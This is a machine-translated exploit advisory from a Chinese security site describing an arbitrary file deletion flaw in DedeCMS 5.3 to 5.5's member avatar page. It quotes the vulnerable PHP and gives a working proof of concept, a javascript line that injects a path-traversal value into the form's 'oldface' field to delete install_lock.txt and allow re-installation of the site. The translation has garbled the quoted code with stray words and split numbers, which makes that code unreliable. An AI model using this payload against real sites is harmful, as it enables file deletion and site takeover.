dedecms5. 3 to 5. 5 arbitrary file deletion 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62201025801
Type myhack58
Reporter 佚名
Modified 2010-01-02T00:00:00


Author: My5t3ry This tasteless exploits of the earliest made in the old General Forum, now online, also with 漏洞 存在 于 /member/edit_face.php 12-47 There are several documents also exist,forget,code is as follows:

if($dopost=='save') { $userdir = $cfg_user_dir.'/'.$ cfg_ml->m_id correspondence between; if(! ereg dividing the('^'.$ userdir,$oldface)) { $oldface = "; } if(is_uploaded_file($face)) { if($faceurl!=") { if( (ereg dividing(':',$faceurl) && ! eregi('^http:',$faceurl)) || ! eregi("\. (jpg|png|gif)",$faceurl)) { ShowMsg("you specify the image url there is the problem!"," -1"); exit(); } }

//Delete the old pictures to prevent the file extension is different, such as: the original is a gif, the later is jpg if($oldface!=" && file_exists($cfg_basedir.$ oldface)) { @unlink($cfg_basedir.$ oldface); }

//Upload new image $face = MemberUploads('face',$faceurl,$cfg_ml->m_id correspondence between,'image','myface',1 8 0,1 8 0); } else { $face = $oldface; } $query = "update #@__member set face = '$face' where mid='{$cfg_ml->m_id correspondence between}' "; $dsql->ExecuteNoneQuery($query); ShowMsg('successful update of the Avatar!', $backurl); exit(); }

Use poc: In the "set personal data" in the"user avatar"to upload a picture,uploaded View Source search oldface ,find its value, Here is/uploads/userup/2/myface. png then go back to upload choose the just uploaded image,do not point the upload Modify/uploads/userup/2/myface. png is the file to delete relative address,如 /dedecms/uploads/userup/2/../../../install/install_lock.txt

javascript:document. form1. oldface. value='/uploads/userup/2/../.. /../install/install_lock.txt';document. form1. submit(); ps:the 5.3 can delete the file to re-install,5.5 will only mess deleted files.